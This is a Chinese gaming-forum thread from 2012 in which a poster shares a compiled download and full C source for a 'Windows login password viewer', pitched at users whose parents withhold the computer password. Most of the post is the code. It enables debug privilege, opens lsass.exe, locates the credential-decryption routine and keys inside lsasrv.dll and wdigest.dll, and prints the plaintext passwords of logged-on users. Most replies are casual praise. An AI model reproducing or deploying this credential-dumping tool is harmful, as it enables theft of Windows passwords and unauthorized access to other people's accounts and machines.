[还在为家长不给电脑密码而心烦?] windows登陆密码查看器开源。

社区服务
高级搜索
猴岛论坛跑跑卡丁车[还在为家长不给电脑密码而心烦?] windows登陆密码查看器开源。
发帖 回复
正序阅读 最近浏览的帖子最近浏览的版块
23个回复

[资源共享][还在为家长不给电脑密码而心烦?] windows登陆密码查看器开源。

楼层直达
小枫工作组

ZxID:17878826

等级: 上尉
举报 只看楼主 使用道具 楼主   发表于: 2012-10-30 0

这里下载完整版,直接使用:
find_cipher.rar[点击下载](19 K) 下载次数:51 累计下载获得 DB 88



下面是源码,请用vc新建一个console application工程后,添加如下cpp。
  1. #include <windows.h>
  2. #include <stdio.h>
  3. //
  4. //  Vsbat[0x710dddd]
  5. //  
  6. //  Note: VC++ 6.0编译/Admin权限执行
  7. //
  8. #define MEM_SIZE 0x1000
  9. #define WIN7     0x1
  10. #define WINXP    0x2
  11. #define WIN03    0x4
  12. typedef struct _LSA_UNICODE_STRING {
  13.     USHORT Length;
  14.     USHORT MaximumLength;
  15.     PWSTR  Buffer;
  16. } LSA_UNICODE_STRING , *PLSA_UNICODE_STRING ;
  17. typedef struct _SECURITY_LOGON_SESSION_DATA {  
  18.     ULONG Size;  
  19.     LUID LogonId;
  20.     LSA_UNICODE_STRING UserName;  
  21.     LSA_UNICODE_STRING LogonDomain;  
  22.     LSA_UNICODE_STRING AuthenticationPackage;  
  23.     ULONG LogonType;  ULONG Session;  
  24.     PSID Sid;  
  25.     LARGE_INTEGER LogonTime;  
  26.     LSA_UNICODE_STRING LogonServer;  
  27.     LSA_UNICODE_STRING DnsDomainName;  
  28.     LSA_UNICODE_STRING Upn;
  29. } SECURITY_LOGON_SESSION_DATA,  *PSECURITY_LOGON_SESSION_DATA ;
  30. typedef int (__stdcall * pNTQUERYPROCESSINFORMATION)(HANDLE, DWORD, PVOID, ULONG, PULONG) ;
  31. typedef int (__stdcall * pLSAENUMERATELOGONSESSIONS)(PULONG, PLUID *) ;
  32. typedef int (__stdcall * pDECRIPTFUNC)(PBYTE, DWORD) ;
  33. typedef int (__stdcall * pLSAFREERETURNBUFFER)(PVOID) ;
  34. typedef int (__stdcall * pLSAGETLOGONSESSIONDATA)(PLUID, PSECURITY_LOGON_SESSION_DATA *) ;
  35. int    EnableDebugPrivilege() ;
  36. void   printHexBytes(PBYTE data, int nBytes) ;
  37. PBYTE  search_bytes(PBYTE pBegin, PBYTE pEnd, PBYTE pBytes, DWORD nsize) ;
  38. void   CopyKeyGlobalData(HANDLE hProcess, LPVOID hModlsasrv, int osKind) ;
  39. HANDLE GetProcessHandleByName(const CHAR *szName) ;
  40. LPVOID GetEncryptListHead() ;
  41. void   printSessionInfo(pLSAGETLOGONSESSIONDATA, pLSAFREERETURNBUFFER, PLUID) ;
  42. // 解密函数特征码(lsasrv.text)
  43. BYTE DecryptfuncSign[] = { 0x8B, 0xFF, 0x55, 0x8B,
  44.                            0xEC, 0x6A, 0x00, 0xFF,
  45.                            0x75, 0x0C, 0xFF, 0x75,
  46.                            0x08, 0xE8 } ;
  47.     
  48. // 密钥KEY相关的关键地址特征码(lsasrv.text)
  49. BYTE DecryptKeySign_WIN7[]  = { 0x33, 0xD2, 0xC7, 0x45, 0xE8, 0x08, 0x00, 0x00, 0x00, 0x89, 0x55, 0xE4 } ;
  50. BYTE DecryptKeySign_XP[]    = { 0x8D, 0x85, 0xF0, 0xFE, 0xFF, 0xFF, 0x50, 0xFF, 0x75, 0x10, 0xFF, 0x35 } ;
  51. // 密文关键指针特征码(wdigest.text)
  52. BYTE KeyPointerSign[]  = { 0x8B, 0x45, 0x08, 0x89, 0x08, 0xC7, 0x40, 0x04 } ;
  53. // 全局变量
  54. BYTE MemBuf[MEM_SIZE], SecBuf[0x200], ThirdBuf[0x200] ;
  55. BYTE Encryptdata[0x100] ;
  56. HANDLE GetProcessHandleByName(const CHAR *szName)
  57. {
  58.     //
  59.     // GetProcessHandle获得lsass.exe进程句柄
  60.     //
  61.     DWORD  dwProcessId , ReturnLength, nBytes ;
  62.     WCHAR  Buffer[MAX_PATH + 0x20] ;
  63.     HANDLE hProcess ;
  64.     PWCHAR pRetStr ;
  65.     pNTQUERYPROCESSINFORMATION NtQueryInformationProcess ;
  66.     CHAR   szCurrentPath[MAX_PATH] ;
  67.     NtQueryInformationProcess = (pNTQUERYPROCESSINFORMATION)GetProcAddress(GetModuleHandle("ntdll.dll") , \
  68.                                     "NtQueryInformationProcess") ;
  69.     // Process ID 一定是 4 的倍数
  70.     for(dwProcessId = 4 ; dwProcessId < 10*1000 ; dwProcessId += 4)
  71.     {
  72.         hProcess = OpenProcess(PROCESS_ALL_ACCESS , FALSE, dwProcessId) ;
  73.         if(hProcess != NULL)
  74.         {
  75.             if(!NtQueryInformationProcess(hProcess, 27, Buffer, sizeof(Buffer), &ReturnLength))
  76.             {
  77.                 pRetStr = (PWCHAR)(*(DWORD *)((DWORD)Buffer + 4)) ;
  78.                 
  79.                 nBytes = WideCharToMultiByte(CP_ACP, 0, pRetStr, -1, \
  80.                                     szCurrentPath, MAX_PATH, NULL, NULL) ;
  81.                 if(nBytes)
  82.                 {
  83.                     PCHAR pCurName = &szCurrentPath[nBytes-1] ;
  84.                     while(pCurName >= szCurrentPath)
  85.                     {
  86.                         if(*pCurName == '\\')  break ;
  87.                         pCurName -- ;
  88.                     }
  89.                     pCurName ++ ;
  90.                     if(lstrcmpi(szName, pCurName) == 0)
  91.                     {
  92.                         return hProcess ;
  93.                     }
  94.                 }
  95.             }
  96.             // 关闭打开的句柄
  97.             CloseHandle(hProcess) ;
  98.         }
  99.     }
  100.     return NULL ;
  101. }
  102. LPVOID GetEncryptListHead()
  103. {
  104.     //
  105.     // 根据KeyPointerSign[]获得密文存储的关键相关地址
  106.     //
  107.     HINSTANCE hMod ;
  108.     LPVOID    pEndAddr, KeyPointer, pTemp ;
  109.     hMod = LoadLibrary("wdigest.dll") ;
  110.     pEndAddr = GetProcAddress(hMod, "SpInstanceInit") ;
  111.     pTemp = hMod ;
  112.     KeyPointer = NULL ;
  113.     while(pTemp < pEndAddr && pTemp != NULL)
  114.     {
  115.         KeyPointer = pTemp ;
  116.         pTemp = (LPVOID)search_bytes((PBYTE)pTemp + sizeof(KeyPointerSign), (PBYTE)pEndAddr, \
  117.                 KeyPointerSign, sizeof(KeyPointerSign)) ;
  118.     }
  119.     KeyPointer = (LPVOID)(*(DWORD *)((DWORD)KeyPointer - 4)) ;
  120.     FreeLibrary(hMod) ;
  121.     return KeyPointer ;
  122. }
  123. int main()
  124. {
  125.     HINSTANCE hModlsasrv ;
  126.     DWORD     LogonSessionCount, i ,dwBytesRead ;
  127.     PLUID     LogonSessionList, pCurLUID , pListLUID ;
  128.     BYTE      EncryptBuf[0x200] ;
  129.     HANDLE    hProcess ;
  130.     printf("欢迎使用windows密码读取器\n");
  131.     if(EnableDebugPrivilege() != 1)
  132.         puts("EnableDebugPrivilege fail !") ;
  133.     hProcess = GetProcessHandleByName("lsass.exe") ;
  134.     if(hProcess == NULL)
  135.     {
  136.         puts("GetProcessHandleByName fail !") ;
  137.         puts("Try To Run As Administrator ...") ;
  138.         system("echo Press any Key to Continue ... & pause > nul") ;
  139.         return 0 ;
  140.     }
  141.     OSVERSIONINFO VersionInformation ;
  142.     DWORD dwVerOff = 0 , osKind = -1 ;
  143.     // 版本判断
  144.     memset(&VersionInformation, 0, sizeof(VersionInformation));
  145.     VersionInformation.dwOSVersionInfoSize = sizeof(VersionInformation) ;
  146.     GetVersionEx(&VersionInformation) ;
  147.     if (VersionInformation.dwMajorVersion == 5)
  148.     {
  149.       if ( VersionInformation.dwMinorVersion == 1 )
  150.       {
  151.             dwVerOff = 36 ;
  152.             osKind = WINXP ;
  153.       }
  154.       else if (VersionInformation.dwMinorVersion == 2)
  155.       {
  156.             dwVerOff = 28 ;
  157.             osKind = WIN03 ;
  158.       }
  159.     }
  160.     else if (VersionInformation.dwMajorVersion == 6)
  161.     {
  162.         dwVerOff = 32 ;
  163.         osKind = WIN7 ;
  164.     }
  165.     if(osKind == -1)
  166.     {
  167.         printf("[Undefined OS version]  Major: %d Minor: %d\n", \
  168.               VersionInformation.dwMajorVersion, VersionInformation.dwMinorVersion) ;
  169.         system("echo Press any Key to Continue ... & pause > nul") ;
  170.         CloseHandle(hProcess) ;
  171.         return 0 ;
  172.     }
  173.     // 获得解密函数地址
  174.     pDECRIPTFUNC  DecryptFunc ;
  175.     hModlsasrv  = LoadLibrary("lsasrv.dll") ;
  176.     DecryptFunc = (pDECRIPTFUNC)search_bytes((PBYTE)hModlsasrv, (PBYTE)0x7fffdddd, DecryptfuncSign, sizeof(DecryptfuncSign)) ;
  177.           
  178.     // 获得密文链表头地址
  179.     LPVOID  ListHead ;
  180.     ListHead = GetEncryptListHead() ;                
  181.     // 获得全局数据(lsasrv.data及解密KEY相关的数据)
  182.     CopyKeyGlobalData(hProcess, hModlsasrv, osKind) ;  
  183.     HINSTANCE                   hModSecur32 ;
  184.     pLSAENUMERATELOGONSESSIONS  LsaEnumerateLogonSessions ;
  185.     pLSAGETLOGONSESSIONDATA     LsaGetLogonSessionData ;
  186.     pLSAFREERETURNBUFFER        LsaFreeReturnBuffer ;
  187.     hModSecur32               = LoadLibrary("Secur32.dll") ;
  188.     LsaEnumerateLogonSessions = (pLSAENUMERATELOGONSESSIONS)GetProcAddress(hModSecur32, "LsaEnumerateLogonSessions") ;
  189.     LsaGetLogonSessionData    = (pLSAGETLOGONSESSIONDATA)GetProcAddress(hModSecur32, "LsaGetLogonSessionData") ;
  190.     LsaFreeReturnBuffer       = (pLSAFREERETURNBUFFER)GetProcAddress(hModSecur32, "LsaFreeReturnBuffer") ;
  191.     LsaEnumerateLogonSessions(&LogonSessionCount, &LogonSessionList) ;
  192.     for(i = 0 ; i < LogonSessionCount ; i++)
  193.     {
  194.         pCurLUID = (PLUID)((DWORD)LogonSessionList + sizeof(LUID) * i) ;
  195.         // 打印相关信息
  196.         printSessionInfo(LsaGetLogonSessionData, LsaFreeReturnBuffer, pCurLUID) ;
  197.         // 遍历链式结构查找当前的LUID
  198.         ReadProcessMemory(hProcess,  ListHead, EncryptBuf, 0x100, &dwBytesRead) ;
  199.         while(*(DWORD *)EncryptBuf != (DWORD)ListHead)
  200.         {
  201.             ReadProcessMemory(hProcess, (LPVOID)(*(DWORD *)EncryptBuf), EncryptBuf, 0x100, &dwBytesRead) ;
  202.             pListLUID = (LUID *)((DWORD)EncryptBuf + 0x10) ;
  203.             if((pListLUID->LowPart  ==  pCurLUID->LowPart) && (pListLUID->HighPart == pCurLUID->HighPart))
  204.             {
  205.                 break ;
  206.             }
  207.         }
  208.         if(*(DWORD *)EncryptBuf == (DWORD)ListHead)
  209.         {
  210.             puts("Specific LUID NOT found\n") ;
  211.             continue ;
  212.         }
  213.         DWORD   pFinal = 0 ;
  214.         DWORD   nBytes = 0 ;
  215.         LPVOID  pEncrypt   ;
  216.         pFinal   = (DWORD)(pListLUID) + dwVerOff  ;
  217.         nBytes   = *(WORD *)((DWORD)pFinal + 2) ;            // 密文大小
  218.         pEncrypt = (LPVOID)(*(DWORD *)((DWORD)pFinal + 4)) ; // 密文地址(Remote)
  219.         memset(Encryptdata, 0, sizeof(Encryptdata)) ;
  220.         ReadProcessMemory(hProcess, (LPVOID)pEncrypt, Encryptdata, nBytes, &dwBytesRead) ;
  221.         // 调用解密函数解密
  222.         DecryptFunc(Encryptdata, nBytes) ;
  223.         // 打印密码明文
  224.         printf("密码: %S\n\n", Encryptdata) ;
  225.     }
  226.     CloseHandle(hProcess) ;
  227.     LsaFreeReturnBuffer(LogonSessionList) ;
  228.     FreeLibrary(hModlsasrv) ;
  229.     FreeLibrary(hModSecur32) ;
  230.     if(osKind == WIN7)
  231.     {
  232.         FreeLibrary(GetModuleHandle("bcrypt.dll")) ;
  233.         FreeLibrary(GetModuleHandle("bcryptprimitives.dll")) ;
  234.     }
  235.   
  236.     system("echo Press any Key to EXIT ... & pause > nul") ;
  237.     return 0 ;
  238. }
  239. void printSessionInfo(pLSAGETLOGONSESSIONDATA  LsaGetLogonSessionData, pLSAFREERETURNBUFFER LsaFreeReturnBuffer, PLUID pCurLUID)
  240. {
  241.     PSECURITY_LOGON_SESSION_DATA pLogonSessionData ;
  242.     LsaGetLogonSessionData(pCurLUID, &pLogonSessionData) ;
  243.     printf("用户名: %S\n", pLogonSessionData->UserName.Buffer) ;
  244.     printf("登陆域名: %S\n", pLogonSessionData->LogonDomain.Buffer) ;
  245.     LsaFreeReturnBuffer(pLogonSessionData) ;
  246. }
  247. int EnableDebugPrivilege()
  248. {
  249.     HANDLE hToken ;
  250.     LUID   sedebugnameValue ;
  251.     TOKEN_PRIVILEGES tkp ;
  252.     if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken) )
  253.     {
  254.         puts("OpenProcessToken fail") ;
  255.         return 0 ;
  256.     }
  257.     if(!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &sedebugnameValue))
  258.     {
  259.         puts("LookupPrivilegeValue fail") ;
  260.         return 0 ;
  261.     }
  262.     tkp.PrivilegeCount = 1 ;
  263.     tkp.Privileges[0].Luid = sedebugnameValue ;
  264.     tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED ;
  265.     if(!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL) )
  266.     {
  267.         puts("AdjustTokenPrivileges fail") ;
  268.         return 0 ;
  269.     }
  270.     return 1 ;
  271. }
  272. PBYTE search_bytes(PBYTE pBegin, PBYTE pEnd, PBYTE pBytes, DWORD nsize)
  273. {
  274.     //
  275.     // 在pBegin与pEnd之间搜索pBytes地址处的指定字节序列,字节个数为nsize
  276.     //
  277.     DWORD count ;
  278.     PBYTE pDst ;
  279.     while((DWORD)pBegin + (DWORD)nsize <= (DWORD)pEnd)
  280.     {
  281.         pDst  = pBytes ;
  282.         count = 0 ;
  283.         while(count < nsize && *pBegin == *pDst)
  284.         {
  285.             pBegin ++ ;
  286.             pDst   ++ ;
  287.             count  ++ ;
  288.         }
  289.         if(count == nsize)  break ;
  290.         pBegin = pBegin - count + 1 ;
  291.     }
  292.     if(count == nsize)
  293.     {
  294.         return (PBYTE)((DWORD)pBegin - (DWORD)count) ;
  295.     }
  296.     else
  297.     {
  298.         return NULL ;
  299.     }
  300. }
  301. void CopyKeyGlobalData(HANDLE hProcess, LPVOID hModlsasrv, int osKind)
  302. {
  303.     PIMAGE_SECTION_HEADER pSectionHead ;
  304.     PIMAGE_DOS_HEADER     pDosHead ;
  305.     PIMAGE_NT_HEADERS     pPEHead  ;
  306.     DWORD                 dwBytes, dwBytesRead ;
  307.     LPVOID                pdataAddr, pDecryptKey , DecryptKey, pEndAddr ;
  308.     
  309.     pDosHead     = (PIMAGE_DOS_HEADER)hModlsasrv ;
  310.     pSectionHead = (PIMAGE_SECTION_HEADER)(pDosHead->e_lfanew + (DWORD)hModlsasrv \
  311.                    + sizeof(IMAGE_NT_HEADERS) + sizeof(IMAGE_SECTION_HEADER)) ;
  312.     pdataAddr = (LPVOID)((DWORD)pSectionHead->VirtualAddress  + (DWORD)hModlsasrv) ;
  313.     dwBytes   = ((DWORD)(pSectionHead->Misc.VirtualSize) / 0x1000 + 1) * 0x1000 ;
  314.     ReadProcessMemory(hProcess, pdataAddr, pdataAddr, dwBytes, &dwBytesRead) ;
  315.     pPEHead   = (PIMAGE_NT_HEADERS)(pDosHead->e_lfanew + (DWORD)hModlsasrv) ;
  316.     pEndAddr  = (LPVOID)(pPEHead->OptionalHeader.SizeOfImage + (DWORD)hModlsasrv) ;
  317.     switch(osKind)
  318.     {
  319.     case WINXP :
  320.     case WIN03 :
  321.         {
  322.             pDecryptKey = (LPVOID)search_bytes((PBYTE)(hModlsasrv), (PBYTE)pEndAddr , \
  323.                             DecryptKeySign_XP, sizeof(DecryptKeySign_XP)) ;
  324.             pDecryptKey = (LPVOID)*(DWORD *)((DWORD)pDecryptKey + sizeof(DecryptKeySign_XP)) ;
  325.             ReadProcessMemory(hProcess, (LPVOID)pDecryptKey, &DecryptKey, 4, &dwBytesRead) ;
  326.             // DecryptKey 是与解密相关的关键地址
  327.             ReadProcessMemory(hProcess, (LPVOID)DecryptKey, MemBuf, 0x200, &dwBytesRead) ;
  328.             pdataAddr  = (LPVOID)pDecryptKey ;
  329.             *(DWORD *)pdataAddr = (DWORD)MemBuf ;
  330.             break ;
  331.         }
  332.     case WIN7 :
  333.         {
  334.             // WIN7 需调用这两个DLL中的函数进行解密
  335.             LoadLibrary("bcrypt.dll") ;
  336.             LoadLibrary("bcryptprimitives.dll") ;
  337.             pDecryptKey = (LPVOID)search_bytes((PBYTE)(hModlsasrv), (PBYTE)pEndAddr , \
  338.                             DecryptKeySign_WIN7, sizeof(DecryptKeySign_WIN7)) ;
  339.             pDecryptKey = (LPVOID)(*(DWORD *)((DWORD)pDecryptKey - 4)) ;
  340.     
  341.             // DecryptKey 是与解密相关的关键地址
  342.             ReadProcessMemory(hProcess,  pDecryptKey, &DecryptKey, 0x4, &dwBytesRead) ;
  343.             
  344.             ReadProcessMemory(hProcess, (LPVOID)DecryptKey, MemBuf, 0x200, &dwBytesRead) ;
  345.             pdataAddr  = (LPVOID)pDecryptKey ;
  346.             *(DWORD *)pdataAddr = (DWORD)MemBuf ;
  347.     
  348.             ReadProcessMemory(hProcess, (LPVOID)(*(DWORD *)((DWORD)MemBuf + 8)), SecBuf, 0x200, &dwBytesRead) ;
  349.             pdataAddr  = (LPVOID)((DWORD)MemBuf + 8) ;
  350.             *(DWORD *)pdataAddr = (DWORD)SecBuf ;
  351.             ReadProcessMemory(hProcess, (LPVOID)(*(DWORD *)((DWORD)MemBuf + 0xC)), ThirdBuf, 0x200, &dwBytesRead) ;
  352.             pdataAddr  = (LPVOID)((DWORD)MemBuf + 0xC) ;
  353.             *(DWORD *)pdataAddr = (DWORD)ThirdBuf ;        
  354.             break ;
  355.         }
  356.     }
  357.     return ;
  358. }
  359. // -- EOF -- //
[ 此帖被小枫工作组在2012-10-30 12:52重新编辑 ]
本帖de评分: 2 条评分 DB +2
DB+1 2012-10-31

谢谢了,拿去学习研究了!

DB+1 2012-10-30

果断先加分… 不过牛B哥的东西都是C语言写的…看不懂 原理是什么啊?

卩丶小破孩er

ZxID:16919656

等级: 大将
好好的一个竞技类游戏,竟然让我等玩成了一个满足虚荣心的养成类游戏。
举报 只看该作者 23楼  发表于: 2013-04-13 0
不明觉厉
相望笑而不语

ZxID:23211710

等级: 上尉
举报 只看该作者 22楼  发表于: 2013-04-13 0
支持
心迷测验。

ZxID:24382864

等级: 大将
举报 只看该作者 21楼  发表于: 2013-04-13 0
完全看不懂  但是楼主好像也是个大神
天地创造的决斗

ZxID:21995478

等级: 大校
举报 只看该作者 20楼  发表于: 2013-04-13 0
不需要
狂龙☆龙卷★♂

ZxID:23154720

等级: 少尉
CP3 The Captain.
举报 只看该作者 19楼  发表于: 2013-04-13 0
回 15楼(a1591123) 的帖子
PE即可
幻影2020

ZxID:24513296

等级: 新兵
举报 只看该作者 18楼  发表于: 2013-04-13 0
太麻烦了
为电脑能开机丶

ZxID:18563743

等级: 大校
一场游戏丶一场梦, 不过是短暂瞬间
举报 只看该作者 17楼  发表于: 2012-10-31 0
回 15楼(a1591123) 的帖子
光盘呢,?U盘呢,?DOS呢,?都可以的亲,我只爱源码.
为电脑能开机丶

ZxID:18563743

等级: 大校
一场游戏丶一场梦, 不过是短暂瞬间
举报 只看该作者 16楼  发表于: 2012-10-31 0
谢谢了,拿去学习研究了!
a1591123

ZxID:5813355

等级: 新兵
举报 只看该作者 15楼  发表于: 2012-10-31 0
好吧  就想问下你  没密码进去你怎么运行这个程序???
a1591123

ZxID:5813355

等级: 新兵
举报 只看该作者 14楼  发表于: 2012-10-31 0
谢谢分享!!!!!!!!!!!!
、西瓜°

ZxID:19411037

等级: 上将
I have a kind of persistence,called Kartrider

举报 只看该作者 13楼  发表于: 2012-10-30 0
小枫的东西总是这么给力……

内容来自[手机版]
猫玖。

ZxID:18449694

等级: 中将
爱,的面包魂
举报 只看该作者 12楼  发表于: 2012-10-30 0
完全不懂
荒岛求生

ZxID:19559583

等级: 中校
幸福就像一个沙漏,你觉得它是在一点一滴的流逝着?还是一点一滴的累积呢
举报 只看该作者 11楼  发表于: 2012-10-30 0
用不着用程序,系统自身就可以解密进去
牵魂 、梦几遍_

ZxID:18436272

等级: 上士
举报 只看该作者 10楼  发表于: 2012-10-30 0
无爱 不需要 支持下
lfdsa

ZxID:18371552

等级: 元帅
[img]http://goo.gl/5x4nz[/img]

举报 只看该作者 9楼  发表于: 2012-10-30 0
太神奇了
烟消丨灬云散

ZxID:12400286

等级: 大将
盗用哥的头像、对哥的图像有意见木有小JJ

举报 只看该作者 8楼  发表于: 2012-10-30 0
果断先加分…
不过牛B哥的东西都是C语言写的…看不懂
原理是什么啊?
?今夕何夕c

ZxID:18246304

等级: 上将

举报 只看该作者 7楼  发表于: 2012-10-30 0
哈哈,强大,可惜我用不着,支持了~!~
d739

ZxID:20645781

等级: 新兵
举报 只看该作者 6楼  发表于: 2012-10-30 0
教坏小孩子,这有个工具不用这么麻烦的
〓猪头哥〓

ZxID:10254433

等级: 大将
不想被他人猪头,就要自己主动猪头。其实觉得这个小猪蛮可爱嘀!
举报 只看该作者 5楼  发表于: 2012-10-30 0
把小孩子都教坏了
不好呀
« 返回列表
发帖 回复